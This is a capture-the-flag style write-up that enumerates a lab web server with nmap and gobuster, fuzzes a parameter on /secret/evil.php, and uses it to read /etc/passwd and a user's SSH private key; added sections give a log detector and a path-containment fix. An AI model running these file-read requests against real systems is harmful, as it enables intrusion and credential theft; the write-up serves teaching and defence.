Pwned Date - 30th June 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.212 -w /usr/share/wordlists/dirb/common.txt -q -t 200 
/.hta                 (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]   
/secret               (Status: 301) [Size: 319] [--> http://192.168.125.212/secret/]
/server-status        (Status: 403) [Size: 280]

Browsing /secret directly turns up nothing, whereas /robots.txt (only 12 bytes) does contain a short entry worth a look.


Running gobuster again against /secret, this time with -x php so that PHP files are included:

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.212/secret -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php
/.hta                 (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/evil.php             (Status: 200) [Size: 0]  
/index.html           (Status: 200) [Size: 4]

So there is a /secret/evil.php, and it answers with an empty body. To find out which GET parameter it accepts, we need to fuzz the parameter name.

Exploitation

In cases like this the usual tool is ffuf; -fs 0 drops the empty responses that every wrong parameter name produces, so only a name the script actually reads shows up:

ffuf -u 'http://192.168.125.212/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 0

Or with gobuster's fuzz mode, if that feels more comfortable (--exclude-length 0 plays the same role as ffuf's -fs 0):

gobuster fuzz -u 192.168.125.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -q -t 200 --exclude-length 0

Either way it is a quick bingo:

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster fuzz -u 192.168.125.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -q -t 200 --exclude-length 0    
Found: [Status=200] [Length=1398] http://192.168.125.212/secret/evil.php?command=/etc/passwd
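From the server's side, the fuzz run above has a very recognisable shape in the Apache access log: one client sending many requests to the same script, each with a different parameter name, almost all answered with a 200 and an empty body, followed by a single non-empty 200 carrying a local file path as the parameter value. The following detector is an added example, not part of the original write-up; the log lines it parses are constructed to mimic that run, and the scanning host's IP (192.168.125.100), the timestamps and the size of the id_rsa response are assumptions rather than captured values.

```python
"""Flag parameter-name fuzzing and file-read hits in Apache access logs.

Added example; not part of the original write-up. The log lines below are
constructed to mimic the gobuster fuzz run: the client IP, timestamps and
the size of the id_rsa response are assumptions, not captured values.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache common/combined log prefix: client, ident, user, timestamp,
# request line, status, response size (trailing referer/UA are ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Local files that have no business appearing as a query-string value.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", ".ssh/id_rsa", "/proc/self/environ")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def analyse(lines, fuzz_threshold=20):
    """Return (fuzz_alerts, file_read_hits).

    fuzz_alerts:    (ip, path) pairs where one client sent at least
                    fuzz_threshold distinct parameter names to one script;
                    wordlist-driven parameter discovery looks exactly like this.
    file_read_hits: requests whose parameter value names a sensitive local
                    file AND that got a 200 with a non-empty body. The empty
                    200s from wrong parameter names are deliberately ignored,
                    mirroring what -fs 0 / --exclude-length 0 filter out.
    """
    names_seen = defaultdict(set)
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        for name, value in rec["params"]:
            names_seen[key].add(name)
            decoded = unquote(value)
            if (rec["status"] == 200 and rec["size"] > 0
                    and any(s in decoded for s in SENSITIVE_PATHS)):
                hits.append((rec["ip"], rec["path"], name, decoded, rec["size"]))
    fuzz_alerts = sorted(k for k, names in names_seen.items() if len(names) >= fuzz_threshold)
    return fuzz_alerts, hits


def constructed_sample():
    """Constructed log lines; 192.168.125.100 as the scanning host is an assumption."""
    tmpl = ('192.168.125.100 - - [30/Jun/2022:10:00:{sec:02d} +0000] '
            '"GET /secret/evil.php?{q} HTTP/1.1" {st} {sz}')
    guesses = ["id", "page", "file", "q", "search", "name", "user", "path", "dir", "view",
               "lang", "p", "action", "cat", "item", "type", "key", "ref", "src", "url", "f"]
    # wrong parameter names: the script ignores them and answers 200 with an empty body
    lines = [tmpl.format(sec=i, q=f"{g}=/etc/passwd", st=200, sz=0) for i, g in enumerate(guesses)]
    # the one name the script reads: length 1398 matches the gobuster result above
    lines.append(tmpl.format(sec=30, q="command=/etc/passwd", st=200, sz=1398))
    lines.append(tmpl.format(sec=31, q="command=/home/mowree/.ssh/id_rsa", st=200, sz=1823))
    # unrelated benign traffic from another host
    lines.append('192.168.125.50 - - [30/Jun/2022:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 10701')
    return lines


if __name__ == "__main__":
    alerts, hits = analyse(constructed_sample())
    for ip, path in alerts:
        print(f"parameter fuzzing: {ip} -> {path}")
    for ip, path, name, value, size in hits:
        print(f"file read: {ip} {path}?{name}={value} ({size} bytes)")
```

The two signals are independent on purpose: the distinct-name count catches the discovery phase even when nothing sensitive is returned, and the non-empty 200 with a sensitive value catches a successful read even from a client that guessed the parameter name on the first try.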


The /etc/passwd output shows a user called mowree, so the next check is whether that user has an SSH private key readable through the same parameter:

/home/mowree/.ssh/id_rsa

Another big bingo: the private key comes back.
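The reason both /etc/passwd and a private key under /home come back is that the script hands whatever arrives in the parameter straight to a file read. The write-up does not show the source of evil.php, so the following is an added example of the check it lacks rather than the box's own code: a name-to-file allowlist for the common case, and for the case where a relative name really must be accepted, a resolve-then-contain check that refuses absolute paths, ../ climbs and symlinks pointing outside the directory. /var/www/html/secret as the document directory is an assumption.

```python
"""Constrain a user-supplied file name to one directory.

Added example, not the code behind evil.php (which the write-up does not
show). It illustrates the check whose absence lets ?command=/etc/passwd and
?command=/home/mowree/.ssh/id_rsa succeed; /var/www/html/secret as the
document directory is an assumption.
"""
import os
import shutil
import tempfile


class UnsafePath(ValueError):
    """Raised when a requested name would resolve outside the allowed directory."""


# Preferred form: map short names to files and never accept a path at all.
ALLOWED_PAGES = {"home": "home.txt", "about": "about.txt"}


def page_for(name):
    """Look a name up in the allowlist; unknown names are rejected, not searched for."""
    try:
        return ALLOWED_PAGES[name]
    except KeyError:
        raise UnsafePath(f"unknown page {name!r}") from None


def resolve_in_base(base_dir, requested):
    """Return the real path of `requested`, provided it stays under base_dir.

    Absolute inputs are refused outright; everything else is joined to the
    base and fully resolved (symlinks included) before the containment check,
    so '../' sequences and symlinks that point outside are both caught.
    """
    if os.path.isabs(requested):
        raise UnsafePath("absolute paths are not accepted")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePath(f"{requested!r} escapes {base_dir}")
    return candidate


def is_rejected(base_dir, requested):
    """True if resolve_in_base refuses the name."""
    try:
        resolve_in_base(base_dir, requested)
    except UnsafePath:
        return True
    return False


def symlink_escape_is_rejected():
    """Create a throwaway directory holding a symlink to /etc/passwd and confirm
    that the link, although it sits inside the base, is refused after resolution."""
    tmp = tempfile.mkdtemp()
    try:
        os.symlink("/etc/passwd", os.path.join(tmp, "leak"))
        return is_rejected(tmp, "leak")
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    base = "/var/www/html/secret"
    for req in ["notes.txt", "/etc/passwd", "../../../../home/mowree/.ssh/id_rsa"]:
        print(f"{req!r}: {'rejected' if is_rejected(base, req) else 'allowed'}")
    print("symlink escape rejected:", symlink_escape_is_rejected())
```

The order of operations matters: a string check for "../" before joining is not enough, because a symlink inside the directory resolves to a path outside it only after realpath, which is why the containment test runs on the resolved candidate. Running the web server as a low-privilege user and keeping home directories unreadable to it would have limited the damage even with the bug present.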